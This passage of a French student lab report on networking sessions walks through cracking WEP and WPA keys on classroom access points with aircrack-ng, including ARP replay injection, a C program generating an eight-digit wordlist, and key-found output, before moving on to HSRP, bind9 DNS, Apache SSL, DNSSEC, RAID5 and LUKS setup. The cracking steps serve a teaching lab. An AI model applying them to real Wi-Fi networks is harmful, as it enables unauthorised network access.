&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;'phy:/dev/virtual/RedFlash,xvdb,w',&lt;br /&gt;
'phy:/dev/virtual/BlackFlash,xvdc,w',&lt;br /&gt;
'phy:/dev/virtual/ReverseFlash,xvdd,w'&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
